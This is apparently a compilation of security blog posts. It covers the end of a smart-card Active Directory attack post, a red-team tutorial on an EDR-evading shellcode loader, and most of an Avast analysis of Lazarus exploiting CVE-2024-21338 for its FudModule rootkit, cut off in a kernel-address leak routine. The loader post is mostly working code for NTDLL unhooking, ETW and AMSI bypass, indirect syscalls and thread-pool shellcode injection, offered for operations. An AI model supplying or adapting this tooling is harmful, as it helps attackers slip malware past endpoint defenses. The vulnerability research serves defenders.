  Base64(key)           :  5K2V8xIaGbUS8ZYqTl120Q==

That is it. You now have a TGT that can be used for 7 days for requesting new TGS tickets for accessing other network resources.

Final Notes

When using physical smart cards within your network it's always a good idea to have cards that require a physical press of a button, or better still a biometric reader. That way, any compromise of a user's account will not lead to generating TGTs, since the smart card will prevent access to the private keys without the physical press of a button or biometric data being present.

References

The post Attacking Smart Card Based Active Directory Networks appeared first on Ethical Chaos.

Creating an OPSEC safe loader for Red Team Operations

29 November 2023 at 09:00

As Red Teamers, we need an OPSEC safe method to execute shellcode via a range of initial access vectors. Things are getting more and more difficult with Endpoint Detection and Response (EDR) products improving, making it more challenging to get an implant.

This post is going to present a slightly new method for bypassing EDR, commonly known as CreateThreadPoolWait. However, instead of using kernel32.dll we will use ntdll.dll.

github GitHub: https://github.com/nettitude/Tartarus-TpAllocInject

The loader published above uses the bypass technique introduced within this article.

We as Red Teamers need to consider what detection mechanisms EDR solutions are using, in order to create an effective loader for evasion. A few of the main options that EDRs have at their disposal to obtain telemetry are:

  • User mode hooking against multiple APIs
  • EtwTi for telemetry against specific actions like allocations on executable pages, etc…
  • ETW / AMSI event telemetry
  • Kernel Callbacks
  • Minifilter driver

Let’s review some of the choices often used by loaders.

  • Bad OPSEC #1 – Strings that hint to malicious actions
  • Bad OPSEC #2 – Unhooking
  • Bad OPSEC #3 – Private bytes (Patching)
  • Bad OPSEC #4 – Hell’s Gate

Some of the above are going to be addressed below, whilst others are left as an exercise for the reader.

Bad OPSEC #1 – Strings

There are multiple ways to approach hiding strings in binaries. In general, the most common reasons for strings within malicious binaries are DLL loading and resolving their exported functions.

We’re not going to focus too much on this issue here, but often strings can be obfuscated through encoding or encryption. Another method used more and more recently is hashing the strings and comparing them in real time – ideal for API resolving and DLL loading.
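As a rough sketch of the hashing idea (not taken from any particular loader), resolving an export by hash rather than by name could look something like the following, walking a module's export table and hashing each exported name until a precomputed constant matches:

#include <windows.h>

// djb2-style hash over an export name; only the resulting constants need to
// live in the final binary, never the plaintext API names.
static DWORD HashName(const char* s) {
    DWORD h = 5381;
    while (*s) h = ((h << 5) + h) + (DWORD)*s++;
    return h;
}

// Walk the export table of an already loaded module and return the export
// whose name hashes to wantedHash (forwarded exports are not handled here).
static FARPROC ResolveByHash(HMODULE mod, DWORD wantedHash) {
    auto base  = (BYTE*)mod;
    auto dos   = (PIMAGE_DOS_HEADER)base;
    auto nt    = (PIMAGE_NT_HEADERS)(base + dos->e_lfanew);
    auto dir   = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
    auto exp   = (PIMAGE_EXPORT_DIRECTORY)(base + dir.VirtualAddress);
    auto names = (DWORD*)(base + exp->AddressOfNames);
    auto ords  = (WORD*) (base + exp->AddressOfNameOrdinals);
    auto funcs = (DWORD*)(base + exp->AddressOfFunctions);
    for (DWORD i = 0; i < exp->NumberOfNames; i++) {
        if (HashName((const char*)(base + names[i])) == wantedHash)
            return (FARPROC)(base + funcs[ords[i]]);
    }
    return nullptr;
}

With something along these lines in place, the binary only carries opaque hash constants, denying an analyst the easy win of running strings over it.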

Bad OPSEC #2 – Unhooking

This is a huge subject to go into; avoiding user space hooks by EDRs.

It is worth mentioning that Microsoft is not a fan of EDR companies hooking all these functions since there are other ways to approach obtaining telemetry, rather than performing shady hooks in DLLs. Some of the more effective and advanced EDRs do not hook any DLLs, such as Microsoft Defender for Endpoint or Elastic.

Let’s try to see which techniques are most common for threat actors to use and why they could be better; there are multiple projects available online where loaders use the unhooking method of loading a second NTDLL (which is an IOC by itself) – changing the protection of the main NTDLL to RWX via VirtualProtect, replacing the hooked section of the main NTDLL from the second one, and then again using VirtualProtect to restore the original permissions.

There are unfortunately many IOCs in the method explained above, and in addition to this, a lot of code reviewed was found to have copied the below code for unhooking.

GetModuleInformation(process, ntdllModule, &mi, sizeof(mi));
LPVOID ntdllBase = (LPVOID)mi.lpBaseOfDll;
HANDLE ntdllFile = CreateFileA("c:\\windows\\system32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
HANDLE ntdllMapping = CreateFileMapping(ntdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
LPVOID ntdllMappingAddress = MapViewOfFile(ntdllMapping, FILE_MAP_READ, 0, 0, 0);

PIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)ntdllBase;
PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)ntdllBase + hookedDosHeader->e_lfanew);

for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++) {
    PIMAGE_SECTION_HEADER hookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));
    
    if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text")) {
        DWORD oldProtection = 0;
        bool isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &oldProtection);
        memcpy((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), (LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize);
        isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, oldProtection, &oldProtection);
    }
}

CloseHandle(process);
CloseHandle(ntdllFile);
CloseHandle(ntdllMapping);
FreeLibrary(ntdllModule);

Most people, however, do not realize that there is a mistake at the end of the code and CloseHandle(ntdllMapping) does not remove the second NTDLL loaded.

The use of FreeLibrary is also a mistake, since it tries to free the main NTDLL which is not possible due to the way Windows processes work. Effectively, the process will have loaded two copies of NTDLL, which in the eyes of an experienced threat hunter or an EDR solution, is most likely a hint to a malicious process.

Bad OPSEC #3 – Private bytes (Patching)

“Private bytes” IOCs usually exist when the loader tries to unhook a DLL, as is the case in the previous example at the stage where a section of NTDLL is copied from the second version and loaded into the first.

There are other instances where threat actors perform patching, such as ETW and AMSI patching. The method is similar to the NTDLL unhooking, but instead of replacing a whole section, threat actors do the same thing EDRs do – they insert a set of instructions at the beginning of the AMSI or ETW function in order to return (exit) from the function.

In the below code, which patches ntdll's exported EtwEventWrite function (the same approach applies to AMSI's exported AmsiScanBuffer), it is clear that the exact same IOCs exist as in the previous situation.

void patchETW(OUT HANDLE& hProc) {

    void* etwAddr = GetProcAddress(GetModuleHandle(L"ntdll.dll"), "EtwEventWrite");
    
    char etwPatch[] = { 0xC3 };
    
    DWORD lpflOldProtect = 0;
    unsigned __int64 memPage = 0x1000;
    void* etwAddr_bk = etwAddr;
    NtProtectVirtualMemory(hProc, (PVOID*)&etwAddr_bk, (PSIZE_T)&memPage, 0x04, &lpflOldProtect);
    NtWriteVirtualMemory(hProc, (LPVOID)etwAddr, (PVOID)etwPatch, sizeof(etwPatch), (SIZE_T*)nullptr);
    NtProtectVirtualMemory(hProc, (PVOID*)&etwAddr_bk, (PSIZE_T)&memPage, lpflOldProtect, &lpflOldProtect);
    std::cout << "[+] Patched etw!\n";

}

There are two memory protection changes (via NtProtectVirtualMemory) and private bytes IOCs here; however, there is a way around this method by using HWBP (Hardware Breakpoint) hooking against those functions. This method works by hooking the function and, at the time the function is called, replacing its behaviour with a different one – such as returning immediately from AmsiScanBuffer.
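A heavily simplified, x64-only sketch of the idea is shown below (assumptions throughout – a real implementation, such as the proof-of-concept linked after this, would also cover every thread and populate AmsiScanBuffer's output parameter properly):

#include <windows.h>

// Address we want to "hook" with a hardware breakpoint (e.g. AmsiScanBuffer).
static PVOID g_target = nullptr;

// Vectored exception handler: when the debug register breakpoint fires at the
// target address, simulate an immediate return instead of running the function.
static LONG CALLBACK VehHandler(PEXCEPTION_POINTERS info) {
    if (info->ExceptionRecord->ExceptionCode == EXCEPTION_SINGLE_STEP &&
        info->ExceptionRecord->ExceptionAddress == g_target) {
        CONTEXT* ctx = info->ContextRecord;
        ctx->Rax = 0;                             // "success" return value (simplified)
        ctx->Rip = *(ULONG_PTR*)ctx->Rsp;         // jump straight back to the caller
        ctx->Rsp += sizeof(ULONG_PTR);            // pop the return address
        return EXCEPTION_CONTINUE_EXECUTION;
    }
    return EXCEPTION_CONTINUE_SEARCH;
}

// Set Dr0/Dr7 on the current thread - no bytes of amsi.dll are ever modified,
// so there are no private bytes or memory protection IOCs.
static void InstallHwbp(PVOID target) {
    g_target = target;
    AddVectoredExceptionHandler(1, VehHandler);
    CONTEXT ctx = {};
    ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;
    GetThreadContext(GetCurrentThread(), &ctx);
    ctx.Dr0 = (ULONG_PTR)target;   // breakpoint address
    ctx.Dr7 |= 1;                  // local enable for Dr0 (execute, 1 byte)
    SetThreadContext(GetCurrentThread(), &ctx);
}

int main() {
    HMODULE amsi = LoadLibraryA("amsi.dll");
    InstallHwbp(GetProcAddress(amsi, "AmsiScanBuffer"));
    // From here on, calls to AmsiScanBuffer on this thread return immediately.
}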

A public proof-of-concept for this method can be found here.

Bad OPSEC #4 – Hell’s Gate Direct Syscalls

Hell’s Gate is an excellent technique of manually going through NTDLL, finding the syscall IDs, and creating a stub which calls the syscall from our process.

Originally, when this technique was released, it was great – EDR solutions were not hooking these stubs – but given that these days a number of products do hook them, the offset calculations can fail. Due to this, the technique was developed further with an update called Halo's Gate, tackling this issue by performing some extra calculations in NTDLL's memory to find the syscall ID.

There was one further update called Tartarus’ Gate – released because Halo’s Gate was not handling a hooking method of a specific EDR. This is a great method of avoiding unhooking IOCs, since for all of the above there is no need for any API such as VirtualProtect or WriteProcessMemory to be used. However, one IOC still exists, which is Direct Syscalls.

This is what the stub looks like:

HellDescent PROC
    mov r10, rcx
    mov eax, wSystemCall

    syscall
    ret
HellDescent ENDP

This IOC occurs because the syscall instruction is executed directly from the loader's memory space and not from the loaded NTDLL, which is easy to detect if a stack trace is reviewed.

The loader presented below will tackle this issue by performing the indirect syscall method, which replaces the syscall instruction in the stub with a JMP instruction to a valid syscall instruction within NTDLL.

Creating the Loader

The task at hand is to create a loader with as few IOCs as possible and decide on the method of the injection. Most EDRs are more lenient for injections that happen in the same process, which is what the loader is going to do. For simplicity’s sake this loader will not focus on AMSI/ETW evasion – it will avoid using unhooking and use Tartarus’ Gate instead, in addition to the indirect syscall evasion. In summary, the loader will use:

  • Tartarus’ Gate
  • Indirect Syscall
  • A new injection method (kind of…)

As previously mentioned, Tartarus’ Gate will be used exactly in the same way but the stub needs to be changed accordingly for the indirect syscall, like below.

.data
    id DWORD 000h
    jmptofake QWORD 00000000h

.code 

    setup PROC
        mov id, 000h
        mov id, ecx
        mov jmptofake, 00000000h
        mov jmptofake, rdx
        ret
    setup ENDP

    executioner PROC
        mov r10, rcx
        mov eax, id
        jmp jmptofake
        ret
    executioner ENDP
end

Initially the loader needs to obtain the memory address of a syscall instruction within NTDLL, which is easy enough by resolving a syscall stub like NtAddBootEntry and adding 18 bytes (0x12), the offset at which the syscall instruction is located within the stub.

By obtaining the above, resolving and calling the NTAPI function is performed as follows.

//Resolving ZwAllocateVirtualMemory
GetSyscallId(hNtdll, &SyscallId, (PCHAR)"ZwAllocateVirtualMemory");
setup(SyscallId, spoofJump);
NTSTATUS status = executioner((HANDLE)-1,&currentVmBase, NULL,&szWmResv,MEM_COMMIT,PAGE_READWRITE);

The GetSyscallId function will perform the Tartarus’ Gate checks to find the syscall ID, and then the setup function in the assembly will set the legitimate syscall instruction address and the ID in memory, so the syscall stub (aka executioner function) will execute the ZwAllocateVirtualMemory via the legitimate syscall instruction in the NTDLL.

The loader will use ZwAllocateVirtualMemory to allocate memory for the shellcode with RW permissions, CopyMemoryEx (a custom memcpy) to write the shellcode into the allocated memory, and NtProtectVirtualMemory to change the permissions of the allocated page to RX.

The last part is the injection method that will use the functions TpAllocWait, TpSetWait and NtWaitForSingleObject.

This injection is based on the CreateThreadPoolWait callback. It starts by using CreateEvent to create an event object in a signalled state, then uses TpAllocWait to create a wait object with the shellcode's allocated address as the callback argument. The TpSetWait function associates the wait object with the event; once the event is signalled (or the wait times out), the wait object's callback is invoked, executing the shellcode.
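For comparison, the documented kernel32 flavour of the same primitive looks roughly like the sketch below (x64 assumed, with a harmless single-ret stub standing in for real shellcode); the loader itself uses the ntdll exports instead, as the full listing that follows shows.

#include <windows.h>
#include <string.h>

int main()
{
    // Stand-in payload: a single ret (0xC3) in executable memory so the example
    // runs harmlessly; a real loader would place its shellcode here instead.
    unsigned char stub[] = { 0xC3 };
    void* payload = VirtualAlloc(nullptr, sizeof(stub),
                                 MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!payload) return 1;
    memcpy(payload, stub, sizeof(stub));

    HANDLE evt = CreateEventA(nullptr, FALSE, TRUE, nullptr);          // created signalled
    PTP_WAIT wait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)payload,   // callback = payload
                                         nullptr, nullptr);
    SetThreadpoolWait(wait, evt, nullptr);                             // arm the wait object
    Sleep(1000);                                                       // let the pool fire the callback
    CloseThreadpoolWait(wait);
    CloseHandle(evt);
    return 0;
}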

int main()
{
    auto hNtdll = GetModuleHandleA("ntdll.dll");
    DWORD SyscallId = 0;
    LPVOID spoofJump = ((char*)GetProcAddress(hNtdll, "NtAddBootEntry")) + 18; //Fetching the Syscall instruction address
    HANDLE c = CreateEventA(NULL, FALSE, TRUE, NULL);

    LPVOID currentVmBase = NULL;
    SIZE_T szWmResv = sizeof(buf);
    //Resolving ZwAllocateVirtualMemory
    GetSyscallId(hNtdll, &SyscallId, (PCHAR)"ZwAllocateVirtualMemory");
    setup(SyscallId, spoofJump);
    NTSTATUS status = executioner((HANDLE)-1,&currentVmBase, NULL,&szWmResv,MEM_COMMIT,PAGE_READWRITE);
    //Allocating space in memory for shellcode

    CopyMemoryEx(currentVmBase, buf, szWmResv);
    //Avoiding hooks with custom copying on current process

    //Resolving NtProtectVirtualMemory
    DWORD oldProt;
    GetSyscallId(hNtdll, &SyscallId, (PCHAR)"NtProtectVirtualMemory");
    setup(SyscallId, spoofJump);
    status = executioner((HANDLE)-1,&currentVmBase, &szWmResv,PAGE_EXECUTE_READ,&oldProt);

    //Resolving TpAllocWait
    HANDLE hThread = NULL;
    pTpAllocWait TpAllocWait = (pTpAllocWait)GetProcAddress(hNtdll, "TpAllocWait");
    status = TpAllocWait((TP_WAIT**)&hThread, (PTP_WAIT_CALLBACK)currentVmBase, NULL, NULL);

    //Resolving TpSetWait
    pTpSetWait TpSetWait = (pTpSetWait)GetProcAddress(hNtdll, "TpSetWait");
    TpSetWait((TP_WAIT*)hThread, c, NULL);

    //Resolving NtWaitForSingleObject
    GetSyscallId(hNtdll, &SyscallId, (PCHAR)"NtWaitForSingleObject");
    setup(SyscallId, spoofJump);
    status = executioner(c, 0, NULL);
}

Obviously, the above code generates an EXE which is not recommended to be used, but it can be easily turned to DLL or to a different execution vector. The full project has been published below.

github GitHub: https://github.com/nettitude/Tartarus-TpAllocInject

There is one more IOC in this execution method – since the payload lives only in memory, execution will appear to come from an unbacked address (an address that does not point to a file on disk), which is suspicious. Working around this will be left as an exercise to the reader.

The post Creating an OPSEC safe loader for Red Team Operations appeared first on LRQA Nettitude Labs.

Lazarus and the FudModule Rootkit: Beyond BYOVD with an Admin-to-Kernel Zero-Day

28 February 2024 at 13:14

Key Points

  • Avast discovered an in-the-wild admin-to-kernel exploit for a previously unknown zero-day vulnerability in the appid.sys AppLocker driver. 
  • Thanks to Avast’s prompt report, Microsoft addressed this vulnerability as CVE-2024-21338 in the February Patch Tuesday update. 
  • The exploitation activity was orchestrated by the notorious Lazarus Group, with the end goal of establishing a kernel read/write primitive. 
  • This primitive enabled Lazarus to perform direct kernel object manipulation in an updated version of their data-only FudModule rootkit, a previous version of which was analyzed by ESET and AhnLab
  • After completely reverse engineering this updated rootkit variant, Avast identified substantial advancements in terms of both functionality and stealth, with four new – and three updated – rootkit techniques. 
  • In a key advancement, the rootkit now employs a new handle table entry manipulation technique in an attempt to suspend PPL (Protected Process Light) protected processes associated with Microsoft Defender, CrowdStrike Falcon, and HitmanPro. 
  • Another significant step up is exploiting the zero-day vulnerability, where Lazarus previously utilized much noisier BYOVD (Bring Your Own Vulnerable Driver) techniques to cross the admin-to-kernel boundary. 
  • Avast’s investigation also recovered large parts of the infection chain leading up to the deployment of the rootkit, resulting in the discovery of a new RAT (Remote Access Trojan) attributed to Lazarus. 
  • Technical details concerning the RAT and the initial infection vector will be published in a follow-up blog post, scheduled for release along with our Black Hat Asia 2024 briefing

Introduction 

When it comes to Windows security, there is a thin line between admin and kernel. Microsoft’s security servicing criteria have long asserted that “[a]dministrator-to-kernel is not a security boundary”, meaning that Microsoft reserves the right to patch admin-to-kernel vulnerabilities at its own discretion. As a result, the Windows security model does not guarantee that it will prevent an admin-level attacker from directly accessing the kernel. This isn’t just a theoretical concern. In practice, attackers with admin privileges frequently achieve kernel-level access by exploiting known vulnerable drivers, in a technique called BYOVD (Bring Your Own Vulnerable Driver). 

Microsoft hasn’t given up on securing the admin-to-kernel boundary though. Quite the opposite, it has made a great deal of progress in making this boundary harder to cross. Defense-in-depth protections, such as DSE (Driver Signature Enforcement) or HVCI (Hypervisor-Protected Code Integrity), have made it increasingly difficult for attackers to execute custom code in the kernel, forcing most to resort to data-only attacks (where they achieve their malicious objectives solely by reading and writing kernel memory). Other defenses, such as driver blocklisting, are pushing attackers to move to exploiting less-known vulnerable drivers, resulting in an increase in attack complexity. Although these defenses haven’t yet reached the point where we can officially call admin-to-kernel a security boundary (BYOVD attacks are still feasible, so calling it one would just mislead users into a false sense of security), they clearly represent steps in the right direction. 

From the attacker’s perspective, crossing from admin to kernel opens a whole new realm of possibilities. With kernel-level access, an attacker might disrupt security software, conceal indicators of infection (including files, network activity, processes, etc.), disable kernel-mode telemetry, turn off mitigations, and more. Additionally, as the security of PPL (Protected Process Light) relies on the admin-to-kernel boundary, our hypothetical attacker also gains the ability to tamper with protected processes or add protection to an arbitrary process. This can be especially powerful if lsass is protected with RunAsPPL as bypassing PPL could enable the attacker to dump otherwise unreachable credentials.  

For more specific examples of what an attacker might want to achieve with kernel-level access, keep reading this blog – in the latter half, we will dive into all the techniques implemented in the FudModule rootkit. 

Living Off the Land: Vulnerable Drivers Edition 

With a seemingly growing number of attackers seeking to abuse some of the previously mentioned kernel capabilities, defenders have no choice but to hunt heavily for driver exploits. Consequently, attackers wishing to target well-defended networks must also step up their game if they wish to avoid detection. We can broadly break down admin-to-kernel driver exploits into three categories, each representing a trade-off between attack difficulty and stealth. 

N-Day BYOVD Exploits 

In the simplest case, an attacker can leverage BYOVD to exploit a publicly known n-day vulnerability. This is very easy to pull off, as there are plenty of public proof-of-concept exploits for various vulnerabilities. However, it’s also relatively straightforward to detect since the attacker must first drop a known vulnerable driver to the file system and then load it into the kernel, resulting in two great detection opportunities. What’s more, some systems may have Microsoft’s vulnerable driver blocklist enabled, which would block some of the most common vulnerable drivers from loading. Previous versions of the FudModule rootkit could be placed in this category, initially exploiting a known vulnerability in dbutil_2_3.sys and then moving on to targeting ene.sys in later versions. 

Zero-Day BYOVD Exploits 

In more sophisticated scenarios, an attacker would use BYOVD to exploit a zero-day vulnerability within a signed third-party driver. Naturally, this requires the attacker to first discover such a zero-day vulnerability, which might initially seem like a daunting task. However, note that any exploitable vulnerability in any signed driver will do, and there is unfortunately no shortage of low-quality third-party drivers. Therefore, the difficulty level of discovering such a vulnerability might not be as high as it would initially seem. It might suffice to scan a collection of drivers for known vulnerability patterns, as demonstrated by Carbon Black researchers who recently used bulk static analysis to uncover 34 unique vulnerabilities across more than 200 signed drivers. Such zero-day BYOVD attacks are notably stealthier than n-day attacks since defenders can no longer rely on hashes of known vulnerable drivers for detection. However, some detection opportunities still remain, as loading a random driver represents a suspicious event that might warrant deeper investigation. For an example of an attack belonging to this category, consider the spyware vendor Candiru, which we caught exploiting a zero-day vulnerability in hw.sys for the final privilege escalation stage of their browser exploit chain. 

Beyond BYOVD 

Finally, the holy grail of admin-to-kernel is going beyond BYOVD by exploiting a zero-day in a driver that’s known to be already installed on the target machine. To make the attack as universal as possible, the most obvious target here would be a built-in Windows driver that’s already a part of the operating system.  

Discovering an exploitable vulnerability in such a driver is significantly more challenging than in the previous BYOVD scenarios for two reasons. First, the number of possible target drivers is vastly smaller, resulting in a much-reduced attack surface. Second, the code quality of built-in drivers is arguably higher than that of random third-party drivers, making vulnerabilities much more difficult to find. It’s also worth noting that – while patching tends to be ineffective at stopping BYOVD attacks (even if a vendor patches their driver, the attacker can still abuse the older, unpatched version of the driver) – patching a built-in driver will make the vulnerability no longer usable for this kind of zero-day attacks. 

If an attacker, despite all of these hurdles, manages to exploit a zero-day vulnerability in a built-in driver, they will be rewarded with a level of stealth that cannot be matched by standard BYOVD exploitation. By exploiting such a vulnerability, the attacker is in a sense living off the land with no need to bring, drop, or load any custom drivers, making it possible for a kernel attack to be truly fileless. This not only evades most detection mechanisms but also enables the attack on systems where driver allowlisting is in place (which might seem a bit ironic, given that CVE-2024-21338 concerns an AppLocker driver).  

While we can only speculate on Lazarus’ motivation for choosing this third approach for crossing the admin-to-kernel boundary, we believe that stealth was their primary motivation. Given their level of notoriety, they would have to swap vulnerabilities any time someone burned their currently used BYOVD technique. Perhaps they also reasoned that, by going beyond BYOVD, they could minimize the need for swapping by staying undetected for longer. 

CVE-2024-21338 

As far as zero-days go, CVE-2024-21338 is relatively straightforward to both understand and exploit. The vulnerability resides within the IOCTL (Input and Output Control) dispatcher in appid.sys, which is the central driver behind AppLocker, the application whitelisting technology built into Windows. The vulnerable control code 0x22A018 is designed to compute a smart hash of an executable image file. This IOCTL offers some flexibility by allowing the caller to specify how the driver should query and read the hashed file. The problem is, this flexibility is achieved by expecting two kernel function pointers referenced from the IOCTL’s input buffer: one containing a callback pointer to query the hashed file’s size and the other a callback pointer to read the data to be hashed.  

Since user mode would typically not be handling kernel function pointers, this design suggests the IOCTL may have been initially designed to be invoked from the kernel. Indeed, while we did not find any legitimate user-mode callers, the IOCTL does get invoked by other AppLocker drivers. For instance, there is a ZwDeviceIoControlFile call in applockerfltr.sys, passing SmpQueryFile and SmpReadFile for the callback pointers. Aside from that, appid.sys itself also uses this functionality, passing AipQueryFileHandle and AipReadFileHandle (which are basically just wrappers over ZwQueryInformationFile and ZwReadFile, respectively). 

Despite this design, the vulnerable IOCTL remained accessible from user space, meaning that a user-space attacker could abuse it to essentially trick the kernel into calling an arbitrary pointer. What’s more, the attacker also partially controlled the data referenced by the first argument passed to the invoked callback function. This presented an ideal exploitation scenario, allowing the attacker to call an arbitrary kernel function with a high degree of control over the first argument. 

A WinDbg session with the triggered vulnerability, traced to the arbitrary callback invocation. Note that the attacker controls both the function pointer to be called (0xdeadbeefdeadbeef in this session) and the data pointed to by the first argument (0xbaadf00dbaadf00d). 

If exploitation sounds trivial, note that there are some constraints on what pointers this vulnerability allows an attacker to call. Of course, in the presence of SMEP (Supervisor Mode Execution Prevention), the attacker cannot just supply a user-mode shellcode pointer. What’s more, the callback invocation is an indirect call that may be safeguarded by kCFG (Kernel Control Flow Guard), requiring that the supplied kernel pointers represent valid kCFG call targets. In practice, this does not prevent exploitation, as the attacker can just find some kCFG-compliant gadget function that would turn this into another primitive, such as a (limited) read/write. There are also a few other constraints on the IOCTL input buffer that must be solved in order to reach the vulnerable callback invocation. However, these too are relatively straightforward to satisfy, as the attacker only needs to fake some kernel objects and supply the right values so that the IOCTL handler passes all the necessary checks while at the same time not crashing the kernel. 

The vulnerable IOCTL is exposed through a device object named \Device\AppId. Breaking down the 0x22A018 control code and extracting the RequiredAccess field reveals that a handle with write access is required to call it. Inspecting the device’s ACL (Access Control List; see the screenshot below), there are entries for local service, administrators, and appidsvc. While the entry for administrators does not grant write access, the entry for local service does. Therefore, to describe CVE-2024-21338 more accurately, we should label it local service-to-kernel rather than admin-to-kernel. It’s also noteworthy that appid.sys might create two additional device objects, namely \Device\AppidEDPPlugin and \Device\SrpDevice. Although these come with more permissive ACLs, the vulnerable IOCTL handler is unreachable through them, rendering them irrelevant for exploitation purposes. 
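The decomposition is easy to reproduce with the standard CTL_CODE bit layout; a quick illustrative sketch (not part of the exploit):

#include <windows.h>
#include <winioctl.h>
#include <stdio.h>

// Break 0x22A018 into the CTL_CODE fields (DeviceType | Access | Function | Method).
int main() {
    const DWORD ioctl = 0x22A018;
    printf("DeviceType: 0x%lx\n", DEVICE_TYPE_FROM_CTL_CODE(ioctl)); // 0x22 (FILE_DEVICE_UNKNOWN)
    printf("Access:     0x%lx\n", (ioctl >> 14) & 0x3);              // 2 = FILE_WRITE_ACCESS
    printf("Function:   0x%lx\n", (ioctl >> 2) & 0xFFF);             // 0x806
    printf("Method:     0x%lx\n", METHOD_FROM_CTL_CODE(ioctl));      // 0 = METHOD_BUFFERED
    return 0;
}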

Access control entries of \Device\AppId, revealing that while local service is allowed write access, administrators are not. 

As the local service account has reduced privileges compared to administrators, this also gives the vulnerability a somewhat higher impact than standard admin-to-kernel. This might be the reason Microsoft characterized the CVE as Privileges Required: Low, taking into account that local service processes do not always necessarily have to run at higher integrity levels. However, for the purposes of this blog, we still chose to refer to CVE-2024-21338 mainly as an admin-to-kernel vulnerability because we find it better reflects how it was used in the wild – Lazarus was already running with elevated privileges and then impersonated the local service account just prior to calling the IOCTL. 

The vulnerability was introduced in Win10 1703 (RS2/15063) when the 0x22A018 IOCTL handler was first implemented. Older builds are not affected as they lack support for the vulnerable IOCTL. Interestingly, the Lazarus exploit bails out if it encounters a build older than Win10 1809 (RS5/17763), completely disregarding three perfectly vulnerable Windows versions. As for the later versions, the vulnerability extended all the way up to the most recent builds, including Win11 23H2. There have been some slight changes to the IOCTL, including an extra argument expected in the input buffer, but nothing that would prevent exploitation.  

We developed a custom PoC (Proof of Concept) exploit and submitted it in August 2023 as part of a vulnerability report to Microsoft, leading to an advisory for CVE-2024-21338 in the February Patch Tuesday update. The update addressed the vulnerability by adding an ExGetPreviousMode check to the IOCTL handler (see the patch below). This aims to prevent user-mode initiated IOCTLs from triggering the arbitrary callbacks. 

The patched IOCTL handler. If feature 2959575357 is enabled, attempts to call the IOCTL with PreviousMode==UserMode should immediately result in STATUS_INVALID_DEVICE_REQUEST, failing to even reach AipSmartHashImageFile

Though the vulnerability may only barely meet Microsoft’s security servicing criteria, we believe patching was the right choice and would like to thank Microsoft for eventually addressing this issue. Patching will undoubtedly disrupt Lazarus’ offensive operations, forcing them to either find a new admin-to-kernel zero-day or revert to using BYOVD techniques. While discovering an admin-to-kernel zero-day may not be as challenging as discovering a zero-day in a more attractive attack surface (such as standard user-to-kernel, or even sandbox-to-kernel), we believe that finding one would still require Lazarus to invest significant resources, potentially diverting their focus from attacking some other unfortunate targets. 

Exploitation 

The Lazarus exploit begins with an initialization stage, which performs a one-time setup for both the exploit and the rootkit (both have been compiled into the same module). This initialization starts by dynamically resolving all necessary Windows API functions, followed by a low-effort anti-debug check on PEB.BeingDebugged. Then, the exploit inspects the build number to see if it’s running on a supported Windows version. If so, it loads hardcoded constants tailored to the current build. Interestingly, the choice of constants sometimes comes down to the update build revision (UBR), showcasing a high degree of dedication towards ensuring that the code runs cleanly across a wide range of target machines.  

A decompiled code snippet, loading version-specific hardcoded constants. This particular example contains offsets and syscall numbers for Win10 1809. 

The initialization process then continues with leaking the base addresses of three kernel modules: ntoskrnl, netio, and fltmgr. This is achieved by calling NtQuerySystemInformation using the SystemModuleInformation class. The KTHREAD address of the currently executing thread is also leaked in a similar fashion, by duplicating the current thread pseudohandle and then finding the corresponding kernel object address using the SystemExtendedHandleInformation system information class. Finally, the exploit manually loads the ntoskrnl image into the user address space, only to scan for relative virtual addresses (RVAs) of some functions of interest. 
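
To make the module-base leak more concrete, here is a minimal user-mode sketch in C of that first step, assuming the semi-documented SystemModuleInformation class (0x0B) and the commonly used RTL_PROCESS_MODULES layout. This is an illustration of the general technique, not the exploit's actual code, and error handling is kept to a minimum.

// Minimal sketch: leaking kernel module base addresses via NtQuerySystemInformation.
// Link against ntdll.lib. The structures below are the widely known (but not officially
// published) layouts used with SystemModuleInformation.
#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifndef NT_SUCCESS
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#endif

#define SystemModuleInformationClass ((SYSTEM_INFORMATION_CLASS)11)

typedef struct _RTL_PROCESS_MODULE_INFORMATION {
    HANDLE Section;
    PVOID  MappedBase;
    PVOID  ImageBase;        // kernel-mode base address of the module
    ULONG  ImageSize;
    ULONG  Flags;
    USHORT LoadOrderIndex;
    USHORT InitOrderIndex;
    USHORT LoadCount;
    USHORT OffsetToFileName; // offset of the bare file name inside FullPathName
    UCHAR  FullPathName[256];
} RTL_PROCESS_MODULE_INFORMATION;

typedef struct _RTL_PROCESS_MODULES {
    ULONG NumberOfModules;
    RTL_PROCESS_MODULE_INFORMATION Modules[1];
} RTL_PROCESS_MODULES;

static PVOID GetKernelModuleBase(const char *name) {
    ULONG len = 0;
    PVOID base = NULL;
    NtQuerySystemInformation(SystemModuleInformationClass, NULL, 0, &len);
    RTL_PROCESS_MODULES *mods = (RTL_PROCESS_MODULES *)malloc(len += 0x1000);
    if (mods && NT_SUCCESS(NtQuerySystemInformation(SystemModuleInformationClass, mods, len, &len))) {
        for (ULONG i = 0; i < mods->NumberOfModules; i++) {
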